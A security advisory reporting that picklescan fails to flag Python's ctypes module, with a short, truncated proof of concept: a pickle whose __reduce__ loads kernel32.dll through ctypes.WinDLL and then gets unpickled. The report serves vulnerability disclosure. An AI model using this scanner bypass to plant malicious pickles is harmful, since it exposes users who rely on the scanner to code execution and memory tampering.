Lack of data validation In picklescan
Description
Picklescan does not block ctypes
Summary
Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to
Load DLLs
Call C functions directly
Manipulate memory raw pointers.
This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.
This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected
PoC
import pickle import ctypes import operator class Kernel32Loader: def __reduce__(self): #we go direct to the kerneeellllllll return (ctypes.WinDLL, ("kernel32.dll",))...
This will create a pickle file which is not detected by the latest version of picklescan as malicious
import pickle print("Loading bypass.pkl...") pickle.load(open("calc_exploit.pkl", "rb"))
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | 0.0.33 |
Aliases
References